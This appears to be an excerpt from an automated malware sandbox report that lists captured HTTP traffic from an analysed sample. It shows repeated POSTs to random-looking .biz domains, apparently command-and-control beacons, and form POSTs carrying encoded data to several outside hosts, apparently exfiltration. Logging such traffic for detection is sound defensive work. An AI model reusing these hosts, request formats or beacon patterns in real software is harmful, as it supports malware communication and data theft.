            Source: global trafficHTTP traffic detected: POST /mlrrqn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: GET /pyxq/?46X=voi6TgACTnyN5gbZYmU17u0h/VvpkraiSkSL1M3zbYGOCvXanSp74LpL3h0aAKQshQlyQ1kby8ogou9zAffBNKdsiowaI9GRahkqR5DXE2LnsscTpBmnflg=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.deepwork.cafeConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /jrcjllgytrwdiwa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /coluyqqcxrllujv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /kifgnlhjpkkxtxqp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /mbtmlu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /4udu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.dresses-executive.sbsOrigin: http://www.dresses-executive.sbsCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.dresses-executive.sbs/4udu/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 34 36 58 3d 64 4e 6d 52 4e 42 42 37 46 69 79 76 2b 74 52 31 41 71 6f 45 57 6b 7a 41 59 59 58 35 35 46 6e 46 38 69 2f 65 6a 4b 67 72 73 68 66 47 38 72 78 53 39 69 58 68 77 41 46 6e 67 68 4b 67 61 30 4c 78 4f 36 33 4f 72 48 4a 30 70 78 58 4d 41 75 2f 69 41 4d 76 53 41 44 70 76 35 78 58 34 6c 64 79 71 34 74 34 6b 4b 76 63 58 6e 72 71 59 44 45 2f 75 41 35 42 5a 4d 36 54 38 30 6c 4e 55 5a 4f 41 62 63 33 6f 43 65 4a 58 71 55 71 4c 75 54 51 32 32 2f 49 32 42 4a 43 41 56 77 59 51 47 45 4d 39 50 54 37 32 67 67 6f 54 50 36 66 65 32 49 56 56 78 6e 63 53 44 2b 73 78 68 57 58 37 64 4a 4d 7a 2b 2f 51 3d 3d Data Ascii: 46X=dNmRNBB7Fiyv+tR1AqoEWkzAYYX55FnF8i/ejKgrshfG8rxS9iXhwAFnghKga0LxO63OrHJ0pxXMAu/iAMvSADpv5xX4ldyq4t4kKvcXnrqYDE/uA5BZM6T80lNUZOAbc3oCeJXqUqLuTQ22/I2BJCAVwYQGEM9PT72ggoTP6fe2IVVxncSD+sxhWX7dJMz+/Q==
            Source: global trafficHTTP traffic detected: POST /iynbmylcmibn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: GET /iynbmylcmibn?usid=24&utid=11154212164 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
            Source: global trafficHTTP traffic detected: POST /4udu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.dresses-executive.sbsOrigin: http://www.dresses-executive.sbsCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 220Referer: http://www.dresses-executive.sbs/4udu/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 34 36 58 3d 64 4e 6d 52 4e 42 42 37 46 69 79 76 38 4d 42 31 46 4e 30 45 65 6b 7a 44 55 34 58 35 72 46 6e 2f 38 69 37 65 6a 49 4d 43 72 54 37 47 2f 4c 42 53 76 7a 58 68 7a 41 46 6e 34 52 4b 6c 48 6b 4c 36 4f 36 37 47 72 43 78 30 70 31 2f 4d 41 75 76 69 41 66 48 56 41 54 70 74 6e 52 58 36 68 64 79 71 34 74 34 6b 4b 75 38 39 6e 71 43 59 44 30 76 75 43 59 42 61 58 61 54 37 67 31 4e 55 64 4f 41 66 63 33 6f 61 65 4d 72 51 55 73 58 75 54 56 79 32 2f 62 75 47 41 43 41 66 30 59 52 74 45 64 45 52 56 4b 62 6f 2b 65 50 7a 2f 76 57 74 45 7a 59 72 32 74 7a 55 73 73 56 53 4c 51 79 70 45 50 4f 33 6b 51 6b 75 72 36 63 6d 73 79 33 6b 51 52 52 71 73 52 54 7a 45 48 6b 3d Data Ascii: 46X=dNmRNBB7Fiyv8MB1FN0EekzDU4X5rFn/8i7ejIMCrT7G/LBSvzXhzAFn4RKlHkL6O67GrCx0p1/MAuviAfHVATptnRX6hdyq4t4kKu89nqCYD0vuCYBaXaT7g1NUdOAfc3oaeMrQUsXuTVy2/buGACAf0YRtEdERVKbo+ePz/vWtEzYr2tzUssVSLQypEPO3kQkur6cmsy3kQRRqsRTzEHk=
            Source: global trafficHTTP traffic detected: POST /ekvacjbfhlcxed HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /hekha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /4udu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.dresses-executive.sbsOrigin: http://www.dresses-executive.sbsCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 6476Referer: http://www.dresses-executive.sbs/4udu/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 34 36 58 3d 64 4e 6d 52 4e 42 42 37 46 69 79 76 38 4d 42 31 46 4e 30 45 65 6b 7a 44 55 34 58 35 72 46 6e 2f 38 69 37 65 6a 49 4d 43 72 54 7a 47 2f 34 4a 53 39 41 2f 68 39 67 46 6e 6d 68 4b 6b 48 6b 4c 6e 4f 36 7a 4b 72 43 4d 44 70 69 48 4d 43 39 58 69 51 4e 76 56 63 54 70 74 33 52 58 2b 72 39 79 57 34 70 55 67 4b 76 63 39 6e 72 65 59 44 30 76 75 44 4a 42 61 4a 36 54 35 67 31 4d 4c 58 75 41 62 63 33 6f 43 65 4a 4f 58 56 61 6e 75 54 31 43 32 34 6f 4b 47 42 69 41 5a 7a 59 52 31 45 63 34 55 56 4b 43 30 2b 61 44 6a 2f 62 43 74 53 53 6c 4d 76 63 47 44 39 39 68 64 64 53 75 36 4d 4e 2b 63 68 69 41 76 74 62 4e 79 75 53 2f 6b 4b 67 38 5a 2b 51 50 49 66 68 70 47 6a 4f 53 44 41 36 78 63 72 46 56 58 39 72 30 64 72 4a 43 51 59 67 55 49 35 34 77 6b 6c 68 77 73 49 6c 62 4a 33 53 35 75 45 66 43 4d 70 4f 64 4c 47 71 69 58 4f 2f 4b 38 31 64 4f 59 42 78 39 62 51 78 4b 35 4c 42 44 55 54 6a 53 45 63 31 2b 6a 52 4a 66 71 57 35 68 5a 43 43 6e 4f 68 7a 37 62 78 53 76 76 69 54 6e 4e 41 72 57 43 57 64 30 63 6a 35 79 74 61 56 2f 6c 75 2b 50 33 4f 66 4f 66 54 59 62 74 42 63 61 70 5a 6b 63 39 2b 4e 6f 4a 51 4a 45 31 65 50 74 5a 5a 72 51 48 73 56 6f 4f 2f 6c 62 6f 48 6e 4b 55 44 57 67 2f 2b 6c 50 35 36 4f 35 44 45 32 33 56 62 52 6f 77 57 49 59 39 32 77 51 36 47 61 5a 6c 6f 42 44 6a 6a 4c 59 53 43 62 66 2f 36 33 30 67 5a 68 70 7a 6c 52 38 6b 52 2f 42 66 51 59 55 68 4c 31 37 49 78 48 2f 62 33 6b 74 6d 70 52 57 50 4a 64 4d 72 36 6f 4f 46 37 64 67 32 43 71 50 59 42 5a 46 4a 44 47 58 58 69 63 2b 57 4c 6f 66 32 47 63 49 34 62 63 50 43 64 70 36 74 73 66 63 78 2f 4a 34 4d 6b 4f 67 2f 38 41 43 74 57 7a 64 6a 4d 36 4c 57 65 39 34 46 35 33 4b 59 6a 4b 74 78 6e 65 35 65 59 43 53 63 58 39 39 30 52 49 6d 61 44 47 6b 6a 52 4e 33 6e 5a 74 66 37 34 49 6b 45 32 67 6d 37 6e 78 42 73 53 39 30 50 64 79 57 33 63 6c 6a 2f 64 50 36 4a 2b 79 6b 49 63 30 36 35 56 71 4b 35 77 43 6a 69 51 54 51 47 50 39 35 65 69 61 6f 52 63 76 71 33 38 56 53 52 33 2b 77 39 47 79 6b 42 57 52 53 6a 36 6b 75 42 2b 49 62 64 58 5a 6a 72 33 4c 56 74 49 56 65 48 45 7a 32 36 33 6e 57 58 6a 76 32 48 54 77 75 39 37 76 49 4b 39 68 78 63 34 43 75 73 47 42 47 35 2f 47 54 63 65 2f 74 4f 4f 6c 65 32 32 4e 33 30 51 4c 70 56 45 2b 42 33 56 30 78 66 56 2f 79 66 66 6c 79 53 73 65 51 49 31 47 6a 38 65 64 42 4c 49 73 7a 30 64 4a 67 6e 6d 64 59 56 63 2f 47 4e 55 6e 6c 4d 52 66 2b 5a 36 67 4a 76 68 72 69 55 4a 4a 57 58 74
            Source: global trafficHTTP traffic detected: POST /jaff HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /ceggfmhqcflw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /lshwgnqb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: GET /4udu/?46X=QPOxO2JOSBeIkdRIJ7kHfEfpa4SAwF/WxXvhpqosjTHM3PFGv2TE4R55nnK/GVLmYbqeoCZ32Sz0NtXBeMrpNSAZ0hCamPuf4pMsJIkclL+7GyT0E55kVqE=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dresses-executive.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /hgdoyscfx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /gwwwatrrjcr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /desvnwm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /khd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /xslmmkpqbqgjieb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /ni HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /sbsmjuxlxkjmq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /7bzp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.dappbtc.xyzOrigin: http://www.dappbtc.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.dappbtc.xyz/7bzp/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 34 36 58 3d 58 54 53 32 65 48 58 4c 42 50 32 6f 6f 70 56 68 4e 30 5a 39 30 6e 75 2f 47 52 44 56 64 55 31 79 54 43 64 5a 4f 42 7a 4c 69 4b 30 32 6c 48 79 6f 30 55 78 70 49 6b 49 51 63 4b 6d 6a 68 55 56 32 43 44 65 54 42 41 34 30 30 6e 31 34 6f 46 5a 61 73 73 6e 2f 4b 66 2f 6c 46 5a 46 66 35 75 56 73 58 52 68 4c 4f 73 78 37 63 73 46 2f 6a 34 6b 58 52 73 63 6f 75 64 30 50 61 63 46 6b 67 7a 50 71 30 44 43 4a 30 70 32 67 41 55 78 62 44 4f 38 69 70 73 2b 59 54 6f 68 4d 45 66 61 36 53 41 4e 53 4e 6c 46 46 36 54 4f 4a 66 57 39 52 72 6e 43 48 47 44 39 74 71 58 74 45 67 77 4a 66 66 7a 77 50 41 41 3d 3d Data Ascii: 46X=XTS2eHXLBP2oopVhN0Z90nu/GRDVdU1yTCdZOBzLiK02lHyo0UxpIkIQcKmjhUV2CDeTBA400n14oFZassn/Kf/lFZFf5uVsXRhLOsx7csF/j4kXRscoud0PacFkgzPq0DCJ0p2gAUxbDO8ips+YTohMEfa6SANSNlFF6TOJfW9RrnCHGD9tqXtEgwJffzwPAA==
            Source: global trafficHTTP traffic detected: POST /oofweypn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /ryl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /xitkiwvxl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /7bzp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.dappbtc.xyzOrigin: http://www.dappbtc.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 220Referer: http://www.dappbtc.xyz/7bzp/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 34 36 58 3d 58 54 53 32 65 48 58 4c 42 50 32 6f 71 49 6c 68 4d 54 31 39 79 48 75 67 59 42 44 56 55 30 31 2b 54 43 52 5a 4f 44 66 62 69 34 51 32 6c 69 4f 6f 31 56 78 70 50 6b 49 51 58 71 6d 71 38 6b 56 48 43 44 53 62 42 45 6b 30 30 6e 68 34 6f 41 39 61 73 62 7a 38 49 50 2f 6e 65 4a 46 64 6b 2b 56 73 58 52 68 4c 4f 6f 5a 52 63 73 64 2f 6a 4d 59 58 51 4e 63 76 6e 39 30 49 5a 63 46 6b 72 54 50 75 30 44 43 6e 30 72 53 4f 41 57 4a 62 44 50 4d 69 75 35 53 62 5a 6f 68 4b 41 66 62 4e 5a 31 6b 33 48 31 38 55 31 43 53 2b 56 33 41 77 71 68 50 64 58 79 63 36 34 58 4a 33 39 33 41 72 53 77 4e 47 62 4e 2f 58 63 79 4c 64 63 55 76 5a 6c 42 49 4e 78 4b 48 75 31 34 4d 3d Data Ascii: 46X=XTS2eHXLBP2oqIlhMT19yHugYBDVU01+TCRZODfbi4Q2liOo1VxpPkIQXqmq8kVHCDSbBEk00nh4oA9asbz8IP/neJFdk+VsXRhLOoZRcsd/jMYXQNcvn90IZcFkrTPu0DCn0rSOAWJbDPMiu5SbZohKAfbNZ1k3H18U1CS+V3AwqhPdXyc64XJ393ArSwNGbN/XcyLdcUvZlBINxKHu14M=
            Source: global trafficHTTP traffic detected: POST /pdwrkjpvy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /sri HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /svogkqt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /7bzp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.dappbtc.xyzOrigin: http://www.dappbtc.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 6476Referer: http://www.dappbtc.xyz/7bzp/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 34 36 58 3d 58 54 53 32 65 48 58 4c 42 50 32 6f 71 49 6c 68 4d 54 31 39 79 48 75 67 59 42 44 56 55 30 31 2b 54 43 52 5a 4f 44 66 62 69 34 59 32 6c 51 32 6f 31 32 5a 70 4f 6b 49 51 65 4b 6d 6e 38 6b 56 65 43 48 32 66 42 45 6f 43 7a 56 6c 34 36 47 42 61 6c 65 66 38 57 50 2f 6e 4b 35 46 5a 79 4f 56 71 58 52 77 43 4f 73 78 52 63 73 68 2f 6a 4d 59 58 52 63 63 76 75 4e 30 4f 5a 63 46 4d 6b 7a 50 71 30 44 43 4a 30 70 2b 65 41 43 31 62 43 76 63 69 72 50 6d 62 56 6f 68 49 4e 2f 62 56 5a 31 67 36 48 32 4e 4e 31 44 4b 55 57 43 4d 77 71 45 53 53 56 44 55 79 73 6c 46 76 6b 58 4d 34 5a 54 31 35 58 36 37 32 62 33 48 52 44 47 48 48 2b 44 41 64 75 6f 2b 71 6e 2b 70 74 32 47 7a 6e 47 71 35 76 4a 66 71 65 6d 65 4e 6a 4f 69 71 66 30 48 47 4c 47 36 2f 5a 79 76 66 73 54 6f 74 77 6b 64 58 6f 6e 64 6e 55 76 6d 4a 49 62 6f 6a 43 73 52 50 58 44 2b 4f 71 47 6d 52 4d 71 70 53 35 62 6c 55 74 65 5a 51 5a 50 6c 46 54 56 49 38 6c 6f 6b 38 33 79 56 79 5a 31 4b 34 76 4f 66 6f 2f 79 52 67 34 55 7a 42 5a 46 77 5a 63 53 66 4b 54 77 6e 56 55 38 58 42 61 73 75 4d 77 4a 57 50 44 72 65 42 32 44 63 6e 43 6c 46 49 4b 76 4e 59 4f 7a 42 68 38 75 52 36 68 65 50 4e 4e 6d 58 57 4d 47 71 76 33 4a 33 65 78 38 56 6b 7a 48 78 62 6c 58 4e 44 6e 5a 42 44 4d 41 65 70 33 7a 73 48 68 71 2f 2f 50 4b 59 35 41 51 6f 50 4b 55 31 68 33 63 50 74 2f 34 51 38 6a 74 30 4d 59 65 71 42 4b 76 4d 76 6b 64 2f 34 71 77 73 73 54 4b 57 49 64 5a 54 74 43 34 33 68 4c 39 70 4d 49 77 68 36 43 4b 77 34 57 36 52 73 6e 77 47 56 6e 69 54 2b 66 53 5a 32 6e 38 52 51 32 50 62 65 4e 38 5a 45 73 32 4a 63 62 78 52 34 58 39 69 4b 36 34 76 38 66 46 2b 47 38 56 30 4c 34 70 46 70 63 2b 51 7a 59 4a 65 66 52 6c 32 49 51 72 6e 45 33 57 69 77 6d 62 6f 50 70 4a 2b 5a 37 78 52 76 53 55 35 4e 6a 31 37 47 42 33 2b 66 4b 45 72 5a 49 48 72 52 42 34 4d 6d 79 45 79 4b 70 7a 48 35 50 54 68 30 47 47 4b 41 63 34 32 68 62 76 77 4e 70 56 43 48 6d 70 75 4e 38 6d 45 6a 51 75 57 59 4b 67 63 63 6b 4e 46 77 67 54 70 38 61 50 56 43 39 6a 34 6d 35 63 61 6b 58 4b 50 7a 69 36 58 53 4d 34 68 79 58 4c 70 6d 79 67 67 6c 6f 6c 56 6f 79 67 30 42 4a 4b 64 6b 46 6b 66 56 73 2f 5a 5a 54 59 75 71 6b 45 71 73 63 6d 66 4a 61 5a 57 70 36 6e 67 5a 4b 72 44 34 79 57 56 4d 4b 68 31 5a 49 2b 44 36 6e 74 72 67 30 47 2b 47 48 66 57 46 55 42 6a 48 6f 69 37 74 35 2b 32 65 59 47 5a 64 50 33 42 42 31 4f 4e 6a 33 55 30 77 52 6d 79 51 48 78 75 72 63 30 72 45 6a 6a 69 53 79 4a 4b 68 71 45 44 74
